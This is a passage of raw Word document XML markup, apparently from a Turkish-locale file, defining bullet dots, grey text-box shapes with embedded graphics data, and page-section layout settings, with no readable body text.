                <v:shape id="Freeform 395" o:spid="_x0000_s2011" style="position:absolute;left:1930;top:6762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/jsMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IK3upuI1iNriKFgmJ7MCp4fGSf&#10;STD7NmRXjf++Kwgeh5n5hpktOluLK7W+cqzhc6BAEOfOVFxo2O9+PsYgfEA2WDsmDXfysJj33maY&#10;GnfjLV2zUIgIYZ+ihjKEJpXS5yVZ9APXEEfv5FqLIcq2kKbFW4TbWiZKjaTFiuNCiQ19l5Sfs4vV&#10;ELLxQSU+twWqX7/5Szbr4+RL6/57t5yCCNSFV/jZXhkNw8kQHm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v47DEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m635,183r-614,l18,182,,162r,-4l,21,21,,635,r21,21l656,162r-18,20l635,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,6945;21,6945;18,6944;0,6924;0,6920;0,6783;21,6762;635,6762;656,6783;656,6924;638,6944;635,6945" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 394" o:spid="_x0000_s2012" type="#_x0000_t202" style="position:absolute;left:1930;top:6762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usis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j6mI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6yK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7420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4556125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="391" name="Freeform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7224 7175"/>
                            <a:gd name="T3" fmla="*/ 7224 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 7224 7175"/>
                            <a:gd name="T7" fmla="*/ 7224 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 7223 7175"/>
                            <a:gd name="T11" fmla="*/ 7223 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 7203 7175"/>
                            <a:gd name="T15" fmla="*/ 7203 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 7197 7175"/>
                            <a:gd name="T19" fmla="*/ 7197 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 7175 7175"/>
                            <a:gd name="T23" fmla="*/ 7175 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 7175 7175"/>
                            <a:gd name="T27" fmla="*/ 7175 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 7200 7175"/>
                            <a:gd name="T31" fmla="*/ 7200 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 7203 7175"/>
                            <a:gd name="T35" fmla="*/ 7203 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 7224 7175"/>
                            <a:gd name="T39" fmla="*/ 7224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2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40778" id="Freeform 392" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:358.75pt;width:2.45pt;height:2.45pt;z-index:-1554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" path="m28,49r-7,l18,48,,28,,22,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,4587240;13335,4587240;11430,4586605;0,4573905;0,4570095;13335,4556125;17780,4556125;31115,4572000;31115,4573905;17780,458724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7472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4510405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="388" name="Group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7103"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="389" name="Freeform 391"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="7102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7285 7103"/>
                              <a:gd name="T3" fmla="*/ 7285 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 7285 7103"/>
                              <a:gd name="T7" fmla="*/ 7285 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 7284 7103"/>
                              <a:gd name="T11" fmla="*/ 7284 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 7264 7103"/>
                              <a:gd name="T15" fmla="*/ 7264 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 7261 7103"/>
                              <a:gd name="T19" fmla="*/ 7261 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 7124 7103"/>
                              <a:gd name="T23" fmla="*/ 7124 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 7103 7103"/>
                              <a:gd name="T27" fmla="*/ 7103 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 7103 7103"/>
                              <a:gd name="T31" fmla="*/ 7103 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 7124 7103"/>
                              <a:gd name="T35" fmla="*/ 7124 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 7264 7103"/>
                              <a:gd name="T39" fmla="*/ 7264 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 7284 7103"/>
                              <a:gd name="T43" fmla="*/ 7284 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 7285 7103"/>
                              <a:gd name="T47" fmla="*/ 728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1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Text Box 39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7102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9" o:spid="_x0000_s2013" style="position:absolute;margin-left:96.5pt;margin-top:355.15pt;width:37.1pt;height:9.15pt;z-index:-15541760;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,7103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">
                <v:shape id="Freeform 391" o:spid="_x0000_s2014" style="position:absolute;left:1930;top:7102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2qBMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE3wX/YblCX6Tu2kLR6CoilKYiSBM/4JK9&#10;JsHs3ZDdJunfdwtCH4eZOcNs96NtRE+drx1rWC4UCOLCmZpLDdf8/XkFwgdkg41j0vBDHva76WSL&#10;iXEDf1GfhVJECPsENVQhtImUvqjIol+4ljh6N9dZDFF2pTQdDhFuG/mi1Ju0WHNcqLClY0XFPfu2&#10;Gj4+z40fr5jaHNfL0+Wuzv1caf00Gw8bEIHG8B9+tFOj4XW1hr8z8Qj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faoExQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,181,,161r,-3l,21,21,,720,r21,21l741,161r-18,20l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,7285;21,7285;18,7284;0,7264;0,7261;0,7124;21,7103;720,7103;741,7124;741,7264;723,7284;720,7285" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 390" o:spid="_x0000_s2015" type="#_x0000_t202" style="position:absolute;left:1930;top:7102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CqicMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwhN201QHop2xlDFBGIzV7rDjW/Ns&#10;Q5uXrom1+++Xw8Djx/d7n022EyMN3jhWsFomIIgrpw3XCj7L42ILwgdkjZ1jUvBLHrLDw2yPqXY3&#10;Lmg8h1rEEPYpKmhC6FMpfdWQRb90PXHkLm6wGCIcaqkHvMVw28l1kmykRcOxocGeXhqq2vPVKsi/&#10;uHg1P+/fH8WlMGW5S/ht0yr1OJ/yZxCBpnAX/7tPWsHTLs6P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Cqic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7523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4780280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="387" name="Freeform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7576 7528"/>
                            <a:gd name="T3" fmla="*/ 7576 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 7576 7528"/>
                            <a:gd name="T7" fmla="*/ 7576 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 7576 7528"/>
                            <a:gd name="T11" fmla="*/ 7576 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 7555 7528"/>
                            <a:gd name="T15" fmla="*/ 7555 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 7549 7528"/>
                            <a:gd name="T19" fmla="*/ 7549 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 7528 7528"/>
                            <a:gd name="T23" fmla="*/ 7528 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 7528 7528"/>
                            <a:gd name="T27" fmla="*/ 7528 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 7552 7528"/>
                            <a:gd name="T31" fmla="*/ 7552 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 7555 7528"/>
                            <a:gd name="T35" fmla="*/ 7555 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 7576 7528"/>
                            <a:gd name="T39" fmla="*/ 757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D9372" id="Freeform 388" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:376.4pt;width:2.45pt;height:2.45pt;z-index:-15541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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,4810760;13335,4810760;11430,4810760;0,4797425;0,4793615;13335,4780280;17780,4780280;31115,4795520;31115,4797425;17780,48107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7574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4733925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="384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7455"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="385" name="Freeform 387"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="7454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7637 7455"/>
                              <a:gd name="T3" fmla="*/ 7637 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 7637 7455"/>
                              <a:gd name="T7" fmla="*/ 7637 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 7637 7455"/>
                              <a:gd name="T11" fmla="*/ 7637 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 7616 7455"/>
                              <a:gd name="T15" fmla="*/ 7616 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 7613 7455"/>
                              <a:gd name="T19" fmla="*/ 7613 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 7476 7455"/>
                              <a:gd name="T23" fmla="*/ 7476 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 7455 7455"/>
                              <a:gd name="T27" fmla="*/ 7455 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 7455 7455"/>
                              <a:gd name="T31" fmla="*/ 7455 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 7476 7455"/>
                              <a:gd name="T35" fmla="*/ 7476 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 7616 7455"/>
                              <a:gd name="T39" fmla="*/ 7616 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 7637 7455"/>
                              <a:gd name="T43" fmla="*/ 7637 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 7637 7455"/>
                              <a:gd name="T47" fmla="*/ 763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7454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5" o:spid="_x0000_s2016" style="position:absolute;margin-left:96.5pt;margin-top:372.75pt;width:41.35pt;height:9.15pt;z-index:-15540736;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,7455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">
                <v:shape id="Freeform 387" o:spid="_x0000_s2017" style="position:absolute;left:1930;top:7454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2VDcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPS6vCMBSE9xf8D+EIbkRTlStajeID8S7c+EBcHppj&#10;W2xOShO1/nsjCHc5zMw3zHRem0I8qHK5ZQW9bgSCOLE651TB6bjpjEA4j6yxsEwKXuRgPmv8TDHW&#10;9sl7ehx8KgKEXYwKMu/LWEqXZGTQdW1JHLyrrQz6IKtU6gqfAW4K2Y+ioTSYc1jIsKRVRsntcDcK&#10;dst1Ot6ct/4i+6dx+3ZZok72SrWa9WICwlPt/8Pf9p9WMBj9wudMOAJy9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dlQ3EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,7637;21,7637;18,7637;0,7616;0,7613;0,7476;21,7455;805,7455;826,7476;826,7616;809,7637;805,7637" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 386" o:spid="_x0000_s2018" type="#_x0000_t202" style="position:absolute;left:1930;top:7454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wBu8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3urGCkGjq4hUEAqlMR48PrPP&#10;ZDH7NmZXTf99t1DwOMzMN8xi1dtG3KnzxrGC8SgBQVw6bbhScCi2b1MQPiBrbByTgh/ysFoOXhaY&#10;affgnO77UIkIYZ+hgjqENpPSlzVZ9CPXEkfv7DqLIcqukrrDR4TbRr4nSSotGo4LNba0qam87G9W&#10;wfrI+Ye5fp2+83NuimKW8Gd6Uep12K/nIAL14Rn+b++0gsk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bAG7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rPr>
          <w:sz w:val="8"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1360" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk3"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
          <w:position w:val="2"/>
          <w:sz w:val="4"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="5080" t="3810" r="1905" b="3175"/>
                <wp:docPr id="382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15" cy="31115"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="49" cy="49"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="383" name="Freeform 38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" cy="49"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 28 w 49"/>
                              <a:gd name="T1" fmla="*/ 49 h 49"/>
                              <a:gd name="T2" fmla="*/ 21 w 49"/>
                              <a:gd name="T3" fmla="*/ 49 h 49"/>
                              <a:gd name="T4" fmla="*/ 18 w 49"/>
                              <a:gd name="T5" fmla="*/ 48 h 49"/>
                              <a:gd name="T6" fmla="*/ 0 w 49"/>
                              <a:gd name="T7" fmla="*/ 28 h 49"/>
                              <a:gd name="T8" fmla="*/ 0 w 49"/>
                              <a:gd name="T9" fmla="*/ 21 h 49"/>
                              <a:gd name="T10" fmla="*/ 21 w 49"/>
                              <a:gd name="T11" fmla="*/ 0 h 49"/>
                              <a:gd name="T12" fmla="*/ 28 w 49"/>
                              <a:gd name="T13" fmla="*/ 0 h 49"/>
                              <a:gd name="T14" fmla="*/ 49 w 49"/>
                              <a:gd name="T15" fmla="*/ 24 h 49"/>
                              <a:gd name="T16" fmla="*/ 49 w 49"/>
                              <a:gd name="T17" fmla="*/ 28 h 49"/>
                              <a:gd name="T18" fmla="*/ 28 w 49"/>
                              <a:gd name="T19" fmla="*/ 49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28" y="49"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="49"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2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8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="24"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="28"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28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8705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16BCD2" id="Group 383" o:spid="_x0000_s1026" style="width:2.45pt;height:2.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 384" o:spid="_x0000_s1027" style="position:absolute;width:49;height:49;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="49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k5C8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5ptxXZZjSK2gtBeugpeH5vn&#10;Zm3ysmxSXf31plDocZiZb5j5sndWnKkLjWcFT+MMBHHldcO1gv1u85iDCBFZo/VMCq4UYLkYPMyx&#10;0P7CX3QuYy0ShEOBCkyMbSFlqAw5DGPfEifv6DuHMcmulrrDS4I7K5+z7EU6bDgtGGxpbaj6Ln+c&#10;gs9G327Z+uOUv08Pr8GUdhXerFKjYb+agYjUx//wX3urFUzyCfyeS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TkLxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                  <v:fill opacity="57054f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="28,49;21,49;18,48;0,28;0,21;21,0;28,0;49,24;49,28;28,49" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="67"/>
          <w:position w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
          <w:spacing w:val="67"/>
          <w:position w:val="-3"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="6985" r="1905" b="635"/>
                <wp:docPr id="379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0" y="0"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="380" name="Freeform 38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2" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 890 w 912"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 912"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 912"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 912"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 912"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 912"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 912"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 890 w 912"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 911 w 912"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 911 w 912"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 893 w 912"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 890 w 912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1" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="911" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="893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0" o:spid="_x0000_s2019" style="width:45.6pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 382" o:spid="_x0000_s2020" style="position:absolute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sYzsAA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPzYrCMBC+C75DGMGbprqgbjWKiLurIMiqDzA0s03Z&#10;ZtI2Uevbm4Pg8eP7X6xaW4obNb5wrGA0TEAQZ04XnCu4nL8GMxA+IGssHZOCB3lYLbudBaba3fmX&#10;bqeQixjCPkUFJoQqldJnhiz6oauII/fnGoshwiaXusF7DLelHCfJRFosODYYrGhjKPs/Xa2C+vtY&#10;EP9sx3Xt3fScHYzZf7ZK9Xvteg4iUBve4pd7pxV8zOL8eCYeAbl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jsYzsAAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r21,21l911,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,182;21,182;18,182;0,161;0,158;0,21;21,0;890,0;911,21;911,161;893,182;890,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 381" o:spid="_x0000_s2021" type="#_x0000_t202" style="position:absolute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WZz8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVems2VhBN3YhIBaFQGuPB42v2&#10;mSzJvo3ZVdN/3y0UPA4z8w2zXI22E1cavHGsYJKkIIgrpw3XCg7l9mUOwgdkjZ1jUvBDHlb548MS&#10;M+1uXNB1H2oRIewzVNCE0GdS+qohiz5xPXH0Tm6wGKIcaqkHvEW47eRrms6kRcNxocGeNg1V7f5i&#10;FayPXLyb8+f3V3EqTFkuUv6YtUo9P43rNxCBxnAP/7d3WsF0PoG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hZnP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&amp;#x00003c;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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr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7728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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="378" name="Freeform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91 242"/>
                            <a:gd name="T3" fmla="*/ 291 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 291 242"/>
                            <a:gd name="T7" fmla="*/ 291 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 290 242"/>
                            <a:gd name="T11" fmla="*/ 290 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 270 242"/>
                            <a:gd name="T15" fmla="*/ 270 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 263 242"/>
                            <a:gd name="T19" fmla="*/ 263 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 242 242"/>
                            <a:gd name="T23" fmla="*/ 242 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 242 242"/>
                            <a:gd name="T27" fmla="*/ 242 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 266 242"/>
                            <a:gd name="T31" fmla="*/ 266 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 270 242"/>
                            <a:gd name="T35" fmla="*/ 270 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 291 242"/>
